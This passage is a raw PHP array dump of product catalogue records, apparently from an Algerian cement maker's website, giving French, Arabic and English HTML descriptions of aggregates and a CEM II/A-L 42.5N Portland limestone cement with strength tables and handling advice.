<p style="text-align:left"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The use of <strong>Fillers </strong>in appropriate dosages in the formulation of concrete makes it possible to improve the flow properties of fresh concrete and the mechanical strengths of hardened concrete.</span></span></span></p>
',
'img_prd' => 'produit-1611671831.png',
'img_prd_detail' => '',
'Code_Pr' => '59998',
'prix_u' => '500',
'fiche_technique' => 'fiche_technique-1615802851.pdf',
'pos_slider' => '1'
),
'Environement' => array(),
'Pemploi' => array(),
'Securite' => array(),
'Specification' => array(),
'Stockage' => array(),
'typecomposition' => array(),
'Caracteristique' => array(),
'Controlequalite' => array()
),
(int) 8 => array(
'Produit' => array(
'id' => '878836',
'nom_fr' => 'Tout Venant Confondu -TVC- 0/31.5 mm',
'nom_ara' => 'Tout Venant Confondu -TVC- 0/31.5 mm',
'nom_en' => 'Tout Venant Confondu -TVC- 0/31.5 mm',
'sous_nom_fr' => '',
'sous_nom_ara' => '',
'sous_nom_en' => '',
'date_ajout' => '2021-01-26',
'image' => '',
'contenu_fr' => '<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le<strong> Tout Venant Confondu -TVC- 0/31.5 mm </strong> est un mélange de Granulats de toutes dimensions. </span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><strong><u>Utilisation</u> :</strong></span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le<strong> Tout Venant Confondu -TVC- 0/31.5 mm</strong> est utilisé dans les :</span></span></p>
<ul>
<li><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Assises de Chaussées (Couche de Base)</strong></span></span></li>
</ul>
<p style="margin-left:36pt"> </p>
<p> </p>
',
'contenu_ara' => '<p dir="rtl" style="text-align: justify;"><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif">إن <strong>Tout Venant Confondu -TVC- 0/31.5 mm</strong> عبارة عن مزيج من الركام من جميع الأحجام.</span></span></small></p>
<p dir="rtl" style="text-align: justify;"><span style="color:#008000"><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><u>مجال الاستعمال</u> :</strong></span></span></small></span></p>
<p dir="rtl" style="text-align: justify;"><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif">يتم استخدام <strong>Tout Venant Confondu -TVC- 0/31.5 mm</strong> في:</span></span></small></p>
<ul dir="rtl">
<li style="text-align: justify;"><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <strong> الطبقات الأرضية (الطبقة الأساسية)</strong></span></span></small></li>
</ul>
',
'contenu_en' => '<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The <strong>Tout Venant Confondu -TVC- 0/31.5 mm</strong> is a mixture of aggregates of all sizes.</span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><u><strong>Use</strong></u></span><strong><span style="color:#008000"> :</span></strong></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The <strong>Tout Venant Confondu -TVC- 0/31.5 mm</strong> is used in:</span></span></p>
<ul>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Ground Layers (Base Layer)</strong></span></span></li>
</ul>
',
'img_prd' => 'produit-1611671534.png',
'img_prd_detail' => '',
'Code_Pr' => '0',
'prix_u' => '0',
'fiche_technique' => 'fiche_technique-1611671534.pdf',
'pos_slider' => '2'
),
'Environement' => array(),
'Pemploi' => array(),
'Securite' => array(),
'Specification' => array(),
'Stockage' => array(),
'typecomposition' => array(),
'Caracteristique' => array(),
'Controlequalite' => array()
)
)
$produit_pos = array(
(int) 0 => array(
'Produit' => array(
'id' => '78999',
'nom_fr' => 'GICA BETON',
'nom_ara' => 'جيكا بيطون',
'nom_en' => 'GICA BETON',
'sous_nom_fr' => 'CEM II A-L 42.5 N',
'sous_nom_ara' => 'CEM II A-L 42.5 N',
'sous_nom_en' => 'CEM II A-L 42.5 N',
'date_ajout' => '2021-01-27',
'image' => '',
'contenu_fr' => '<p style="text-align: justify;"> <span dir="ltr" lang="fr"><span style="color:#006400"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u><strong>Composition</strong></u><strong> : </strong></span></span></span></span></p>
<p style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Le<strong> Ciment Portland au Calcaire CEM II/A-L 42,5N -NA 442/2013</strong>- résulte du mélange du clinker en quantité au moins égale à 88-82 % et d’autres constituants tels que le Tuf & la Pouzzolane dont le total ne dépasse pas 7-13 %. </span> <span style="color:rgb(50, 50, 50)"> </span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#006400"><u><strong>Valeurs Limites</strong></u><strong> :</strong></span></span></span><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#006400"> </span><span style="color:rgb(50, 50, 50)"> </span></span></span></span></p>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Des valeurs limites de résistances minimales sont fixées aux échéances 2 et 28 jours. Des valeurs limites sont également fixées pour la teneur en SO3 inférieure à 3,5 % et la teneur en ions chlorure inférieure à 0,10 %.</span></span></span></p>
<p style="margin-left:21.3pt"><span dir="ltr" lang="fr"><span style="color:#006400"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Valeur limite de résistance à la compression pour CEM II/A-L 42,5N -NA 442/2013-</strong></span></span></span></span></p>
<table align="center" border="1" cellpadding="0" cellspacing="0" style="height:324px; width:432px">
<thead>
<tr>
<th scope="col" style="height:88px; width:110px">
<p style="text-align:left"><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Classe de Résistance</strong></span></span></span></p>
</th>
<th scope="col" style="height:88px; width:142px">
<p style="text-align:left"><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Limite de la Résistance selon la Norme NA 442</strong></span></span></span></p>
</th>
<th scope="col" style="height:88px; width:120px">
<p style="text-align:left"><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Limite Inférieure Spécifiée de notre Ciment</strong></span></span></span></p>
</th>
<th scope="col" style="height:88px; width:151px">
<p style="text-align:left"><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Limite Supérieure Spécifiée de notre Ciment</strong></span></span></span></p>
</th>
</tr>
</thead>
<tbody>
<tr>
<td style="height:85px; width:110px">
<p style="text-align:center"><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>02 jours</strong></span></span></span></p>
</td>
<td style="height:85px; width:142px">
<p style="text-align:center"><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>≥ 10,0</strong></span></span></span></p>
</td>
<td style="height:85px; width:120px">
<p style="text-align:center"><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>22.08</strong></span></span></span></p>
</td>
<td style="height:85px; width:151px">
<p style="text-align:center"><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>25.98</strong></span></span></span></p>
</td>
</tr>
<tr>
<td style="height:57px; width:110px">
<p style="text-align:center"><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>28 jours</strong></span></span></span></p>
</td>
<td style="height:57px; width:142px">
<p style="text-align:center"><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>62.5≤res≥42,5</strong></span></span></span></p>
</td>
<td style="height:57px; width:120px">
<p style="text-align:center"><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>44,18</strong></span></span></span></p>
</td>
<td style="height:57px; width:151px">
<p style="text-align:center"><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>48.49</strong></span></span></span></p>
</td>
</tr>
</tbody>
</table>
<p> </p>
<p><span style="color:#006400"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u><strong>Contrôle de la Qualité</strong></u><strong> :</strong> </span></span></span></p>
<p><span dir="ltr" lang="fr"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La SCIMAT fabrique et commercialise des Ciments de <strong>Qualité </strong>conformément aux Normes Algériennes en vigueur. Ils sont contrôlés périodiquement par le Centre d’Études et de Services Technologiques de l’Industrie des Matériaux de Construction -CETIM-(accrédité selon le Référentiel ISO 17025). </span></span></span></span></p>
<p><span style="color:#006400"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><u>Principaux domaines d’emploi</u> :</strong></span></span></span></p>
<p><span dir="ltr" lang="fr"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <strong>CEM II/A-L 42,5N</strong> -<strong>NA 442/2013-</strong> convient pour les travaux de toute nature en béton armé. Notre ciment est adapté au béton précontraint et au béton armé. De façon générale, le <strong>CEM II/A-L 42,5N</strong> <strong>-NA 442/2013-</strong> est bien adapté pour les travaux massifs exigeant une élévation de température modérée. La classe R sera préférée pour les travaux exigeants des résistances initiales plus élevées. Pour les travaux en milieux agressifs, on emploiera le Ciment pour les travaux à la mer (PM) ou résistant aux eaux sulfatées (ES).</span></span></span></span></p>
<p><span style="color:#006400"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><u>Précautions particulières</u> :</strong></span></span></span></p>
<p><span dir="ltr" lang="fr"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Lorsque l’aspect esthétique est important (béton brut, enduits), il convient d’éviter l’emploi de certain <strong>CEM II</strong> comportant des proportions importantes de constituants susceptibles d’entraîner des variations de teinte trop marquées, les cendres volantes notamment.</span></span></span></span></p>
<p><span style="color:#006400"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><u>Recommandations Spécifiques et Générales</u> :</strong></span></span></span></p>
<ul>
<li>
<p><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Utiliser des granulats propres, exempts de matières organiques;</span></span></span></span></p>
</li>
<li>
<p><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Respecter les dosages et les règles de l’art pour la mise en œuvre;</span></span></span></span></p>
</li>
<li>
<p><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Viser un rapport Eau/Ciment de préférence le plus faible possible, compatible avec une bonne rhéologie du béton frais;</span></span></span></span></p>
</li>
<li>
<p><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Utiliser des adjuvants normalisés;</span></span></span></span></p>
</li>
<li>
<p><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Éviter une dessiccation précoce par temps chaud ou venteux en réalisant une cure du béton (arrosage, bâche humide, produits de cure…);</span></span></span></span></p>
</li>
<li>
<p><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Adapter la vibration du béton à sa consistance pour obtenir une compacité optimale sans ségrégation;</span></span></span></span></p>
</li>
<li>
<p><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Éviter tout contact avec la peau et les yeux;</span></span></span></span></p>
</li>
<li>
<p><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Utiliser des équipements adaptés : gants, chaussures imperméables, lunettes…</span></span></span></span></p>
</li>
</ul>
<p><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#FF0000"><u><strong>Sécurité</strong></u> :<strong> </strong></span></span></span></span></p>
<p><span dir="ltr" lang="fr"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La SCIMAT vise à être l'employeur le plus sûr de la Société par l’amélioration des conditions de travail pour éviter toutes blessures corporelles et répercussions sanitaires liées à ses activités.</span></span></span></span></p>
<p><span style="color:#006400"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u><strong>Mesures de Protection</strong></u><strong> :</strong></span></span></span></p>
<ul>
<li>
<p><span dir="ltr" lang="fr"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Mélanger à l'eau, le Ciment est irritant; </span></span></span></span></p>
</li>
<li>
<p><span dir="ltr" lang="fr"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Éviter le contact avec les yeux et la peau;</span></span></span></span></p>
</li>
<li>
<p><span dir="ltr" lang="fr"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Laver immédiatement et abondamment à l'eau toute zone exposée; </span></span></span></span></p>
</li>
<li>
<p><span dir="ltr" lang="fr"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">En cas de contact avec les yeux, consulter impérativement un médecin. </span></span></span></span></p>
</li>
</ul>
<p><span dir="ltr" lang="fr"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Pour plus de détails,Veuillez- vous reporter à la Fiche de Données de Sécurité détaillée.</span></span></span></span></p>
<div class="source_url_spacer">
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#006400"><u><strong>Environnement</strong></u><strong> :</strong></span></span></span></p>
<p><span dir="ltr" lang="fr"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La SCIMAT vise à être en permanence un exemple de la responsabilité écologique de la Société par la protection de l’environnement, y compris la prévention de la pollution et l’utilisation de ressources durables et ce par<em> </em> :</span></span></span></span></p>
<ul>
<li>
<p><span dir="ltr" lang="fr"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La préservation des ressources naturelles;</span></span></span></span></p>
</li>
<li>
<p><span dir="ltr" lang="fr"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La réduction des rejets atmosphériques;</span></span></span></span></p>
</li>
<li>
<p><span dir="ltr" lang="fr"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La maitrise de la gestion des déchets. </span></span></span></span></p>
</li>
</ul>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#40E0D0"> <u><strong>Stockage</strong></u><strong> :</strong></span></span></span></p>
<p><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Le Ciment doit être stocké au sec et protégé de l'humidité. </span> <span style="color:#008000"><strong> </strong></span></span></span></span></p>
<p><span style="color:#40E0D0"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><u>Conditionnement</u> :</strong></span></span></span></p>
<p><span dir="ltr" lang="fr"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Le <strong>Ciment Portland CEM II A-L 42.5 N</strong> est livré en vrac et en sacs de 50 kg.</span></span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><u><span style="color:#000080">Certification</span></u><span style="color:#000000"> :</span></strong></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"><span dir="ltr" lang="fr">Le <strong>Ciment CEM II/A (P-L) 42,5N</strong> est certifié selon la <strong>Norme Algérienne 442/2013 </strong>à la Marque de Conformité Nationale <strong>TEDJ</strong> délivrée par l’Institut Algérien de Normalisation -IANOR-</span>.</span></span></span></p>
</div>
',
'contenu_ara' => '<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><u><span style="color:#008000"><strong>التركيبة</strong></span></u><span style="color:#008000"><strong> :</strong></span></span></span></p>
<p style="text-align:right"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">الاسمنت البورتلاندي بالحجر الجيري <strong>CEM II/A-L 42,5N </strong> ناتج عن خليط الكلنكر بكمية لا تقل عن 88-82٪ ومكونات أخرى مثل Tuff & Pozzolane ، والتي لا يتجاوز مجموعها 7 -13٪.</span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#008000"><u><strong>القيم الحدية</strong></u><strong> :</strong></span></span></span></p>
<div id="tw-target">
<div class="g9WsWb" id="kAz1tf">
<div class="tw-ta-container hide-focus-ring tw-lfl" id="tw-target-text-container">
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">يتم تعيين قيم الحد الأدنى من القوة لمدة 2 و 28 يومًا. يتم أيضًا تعيين القيم الحدية لمحتوى SO3 أقل من 3.5٪ ومحتوى أيون الكلوريد أقل من 0.10٪</span></span></p>
</div>
</div>
</div>
<p style="text-align:center"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong><span style="color:#008000">قيمة حد قوة الانضغاط لـ CEM II / A-L 42.5N </span></strong></span></span></p>
<table border="1" cellpadding="1" cellspacing="1" style="height:186px; width:431px">
<tbody>
<tr>
<td style="text-align:center"><span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>حد القوة وفقًا للمعيار NA 442</strong></span></span></span></td>
<td dir="rtl" style="text-align:center"><span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>الحد الأدنى المحدد لأسمنت SCIMAT</strong></span></span></span></td>
<td dir="rtl" style="text-align:center"><span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>الحد الأعلى المحدد لأسمنت SCIMAT</strong></span></span></span></td>
<td style="text-align:center">
<p><span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>فئة المقاومة </strong></span></span></span></p>
</td>
</tr>
<tr>
<td style="text-align:center">
<p><span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong> </strong></span></span></span> <span style="font-size:16px"><span style="font-family:times new roman,times,serif"><small><strong><span style="color:rgb(50, 50, 50)">≥</span></strong></small></span></span> <span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>10,0</strong></span></span></span></p>
</td>
<td style="text-align:center"><span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>22.08</strong></span></span></span></td>
<td style="text-align:center"><span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>25.98</strong></span></span></span></td>
<td style="text-align:center"><span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>يومًان</strong></span></span></span></td>
</tr>
<tr>
<td style="text-align:center"><strong>62.5≤res≥42,5</strong></td>
<td style="text-align:center"><span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>44,18</strong></span></span></span></td>
<td style="text-align:center"><span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>48.49</strong></span></span></span></td>
<td dir="rtl" style="text-align:center"><span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>يومًا28</strong></span></span></span></td>
</tr>
</tbody>
</table>
<p style="text-align:right"> </p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#008000"><u><strong>رقابة الجودة</strong></u><strong> :</strong></span></span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">تقوم SCIMAT بان<span style="color:#000000">ت</span>اج وتسويق الأسمنت عالي <strong>الجودة</strong> وفقًا للمعايير الجزائرية المعمول بها. يتم فحصها بشكل دوري من قبل مركز الدراسات والخدمات ا<span style="color:#000000">لتكنولوجية </span>لصناعة مواد البناء -CETIM-(المعتمد وفقًا لمعيار ISO 17025).</span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong><u><span style="color:#008000">مجالات الاستعمال الرئيسية:</span></u></strong></span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">يعتبر <strong>CEM II / A-L 42.5N</strong> مناسبًا لجميع أنواع أعمال الخرسانة المسلحة. الأسمنت الخاص بنا مناسب للخرسانة سابقة الإجهاد والخرسانة المسلحة. بشكل عام ، يعتبر <strong>CEM II / A-L 42.5N</strong> مناسبًا تمامًا للأعمال الضخمة التي تتطلب ارتفاعًا معتدلًا في درجة الحرارة. سيتم تفضيل الفئة R للعمل الذي يتطلب نقاط قوة أولية أعلى. للعمل في بيئات عدوانية ، سيتم استخدام الأسمنت للعمل في البحر (PM) أو مقاومة للمياه الكبريتية (ES).</span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#008000"><u><strong>إحتياطات خاصة </strong></u><strong>:</strong></span></span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#000000">عندما يكون الجانب الجمالي مهمًا (الخرسانة الخام ، اللصقات) ، فمن المستحسن تجنب استخدام <strong>CEM II</strong> الذي يشتمل على نسب كبيرة من المكونات التي قد تسبب اختلافات ملحوظة في اللون ، وخاصة الرماد المتطاير.</span></span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#008000"><u><strong>توصيات محددة وعامة</strong></u><strong> :</strong></span></span></span></p>
<ul dir="rtl">
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> استخدام ركام نظيف وخالي من المواد العضوية ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> احترام الجرعات وقواعد فن التنفيذ ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> تهدف إلى نسبة الماء / الأسمنت ، ويفضل أن تكون منخفضة قدر الإمكان ، ومتوافقة مع الانسيابية الجيدة للخرسانة الطازجة ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> استخدام مواد مساعدة معيارية ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> تجنب الجفاف المبكر في الطقس الحار أو العاصف عن طريق معالجة الخرسانة (الري ، القماش المشمع الرطب ، منتجات المعالجة ، إلخ) ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> تكييف اهتزازات الخرسانة مع قوامها للحصول على تماسك أمثل بدون فصل ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> تجنب ملامسة الجلد والعينين ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> استخدم المعدات المناسبة: القفازات ، والأحذية المقاومة للماء ، والنظارات ، وما إلى ذلك.</span></span></p>
</li>
</ul>
<p dir="rtl" style="text-align:justify"><span style="color:#FF0000"><u><strong><span style="font-family:times new roman,times,serif"><span style="font-size:16px">الحماية :</span></span></strong></u></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">تهدف SCIMAT إلى أن تكون الشركة الأكثر أمانًا في المجتمع من خلال تحسين ظروف العمل لتجنب أي إصابات جسدية وتداعيات صحية مرتبطة بأنشطتها</span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#008000"><u><strong>تدابير وقائية:</strong></u></span></span></span></p>
<ul dir="rtl">
<li style="text-align:left">
<p style="text-align:justify"><span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> يخلط مع الماء ، والأسمنت مزعج.</span></span></span></p>
</li>
<li style="text-align:left">
<p style="text-align:justify"><span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> تجنب ملامسة العينين والجلد؛</span></span></span></p>
</li>
<li style="text-align:left">
<p style="text-align:justify"><span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> اغسل جميع المناطق المكشوفة على الفور بكمية كبيرة من الماء ؛</span></span></span></p>
</li>
<li style="text-align:left">
<p style="text-align:justify"><span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> في حالة ملامسة العين لا بد من استشارة الطبيب.</span></span></span></p>
</li>
</ul>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">لمزيد من التفاصيل ، يرجى الرجوع إلى ورقة بيانات السلامة التفصيلية. </span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#008000"><u><strong>البيئة</strong></u><strong>:</strong></span></span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">تهدف SCIMAT إلى أن تكون بشكل دائم مثالاً للمسؤولية البيئية للمجتمع من خلال حماية البيئة ، بما في ذلك منع التلوث واستخدام الموارد المستدامة من خلال:</span></span></p>
<ul dir="rtl">
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> الحفاظ على الموارد الطبيعية ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> الحد من انبعاثات الغلاف الجوي ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> التمكن من إدارة النفايات</span></span></p>
</li>
</ul>
<p dir="rtl" style="text-align:justify"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#40E0D0"><strong><u>التخزين:</u> </strong></span></span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">يجب تخزين الأسمنت في مكان جاف وحمايته من الرطوبة</span></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#40E0D0"><strong></strong></span></span></span><br />
</p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#40E0D0"><u><strong>التكييف</strong></u><strong> : </strong></span><span style="color:#008000"><strong> </strong></span></span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">يتم تسليم الأسمنت البورتلاندي <strong>CEM II A-L 42.5 N</strong> سائبًا وفي أكياس سعة 50 كجم. </span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#000080"><strong> <u>الشهادة</u> :</strong></span></span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif; font-size:16px">تم اعتماد </span><strong>CEM II / A (P-L) 42.5N</strong><span style="font-family:times new roman,times,serif; font-size:16px"> وفقًا للمعيار الجزائري </span><strong>2013/442</strong><span style="font-family:times new roman,times,serif; font-size:16px"> مع علامة المطابقة الوطنية </span><strong>TEDJ</strong><span style="font-family:times new roman,times,serif; font-size:16px"> الصادرة عن المعهد الجزائري للتقييس -IANOR-.</span></p>
',
'contenu_en' => '<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><u><strong>Composition</strong></u><strong> :</strong></span><br />
The <strong>Cement Portland</strong> with Limestone <strong>CEM II/A-L 42,5N -NA 442/2013</strong>- results from the mixture of clinker in a quantity at least equal to 88-82% and other constituents such as Tuff & Pozzolana, the total of which does not exceed 7-13%.</span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><u><strong>Limit Values</strong></u></span><strong> :</strong></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The limit values for minimum strengths are set for 2 and 28 days. The limit values are also set for the SO3 content below 3.5% and the chloride ion content below 0.10%.</span></span></p>
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><span style="color:#008000">Compressive strength limit value for CEM II / A-L 42.5N -NA 442/2013-</span></strong></span></span></p>
<table align="center" border="1" cellpadding="0" cellspacing="0" style="height:413px; width:425px">
<tbody>
<tr>
<td style="height:88px; width:110px">
<p style="text-align:center"> </p>
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Resistance Class</strong></span></span></p>
<p style="text-align:center"> </p>
<p style="text-align:center"> </p>
</td>
<td style="height:88px; width:142px">
<p style="text-align:center"> </p>
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Limit of Resistance according to Standard NA 442</strong></span></span></p>
</td>
<td style="height:88px; width:120px">
<p style="text-align:center"> </p>
<div class="QmZWSe">
<div class="DHcWmd" style="text-align: center;"> </div>
</div>
<div class="oSioSc">
<div id="tw-target">
<div class="g9WsWb" id="kAz1tf">
<div class="tw-ta-container hide-focus-ring tw-nfl" id="tw-target-text-container">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Specified Lower Limit<br />
of our Cement</strong></span></span></p>
</div>
</div>
</div>
</div>
<p style="text-align:center"> </p>
</td>
<td style="height:88px; width:151px">
<p style="text-align:center"> </p>
